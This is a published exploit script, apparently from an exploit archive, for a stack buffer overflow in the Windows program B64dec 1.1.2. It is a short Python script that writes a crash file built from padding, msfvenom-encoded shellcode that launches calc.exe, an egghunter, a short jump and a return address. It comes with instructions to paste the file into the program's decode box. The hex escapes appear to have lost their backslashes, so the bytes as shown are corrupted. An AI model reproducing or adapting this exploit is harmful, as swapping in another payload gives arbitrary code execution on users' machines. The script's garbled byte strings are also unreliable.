B64dec 1.1.2 Buffer Overflow ↭
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86
#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.
f = open("crash.txt", "wb")
padding1 = b"ERCDERCD"
padding1 += b"x90" * 100
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b 'x00x0ax0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29"
payload += b"xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca"
payload += b"xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca"
payload += b"x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2"
payload += b"x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17"
payload += b"x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59"
payload += b"xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1"
payload += b"xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf"
payload += b"x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82"
payload += b"x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5"
payload += b"x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4"
payload += b"xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20"
payload += b"x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d"
payload += b"x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee"
payload += b"x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9"
payload += b"x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a"
payload += b"x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d"
egghunter = b"x8BxFD" # mov edi,ebp
egghunter += b"xB8x45x52x43x44" # mov eax,45525344 ERCD
egghunter += b"x47" # inc edi
egghunter += b"x39x07" # cmp dword ptr ds:[edi],eax
egghunter += b"x75xFB" # jne
egghunter += b"x39x07" # cmp dword ptr ds:[edi],eax
egghunter += b"x75xF7" # jne
egghunter += b"xFFxE7" # jmp edi
buf = padding1 + payload
buf += b"x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"x90" * (620 - len(buf))
buf += b"x90x90xEBxCE"
buf += b"x86x1ex40" #00401e86
f.write(buf)
f.close()
Gloss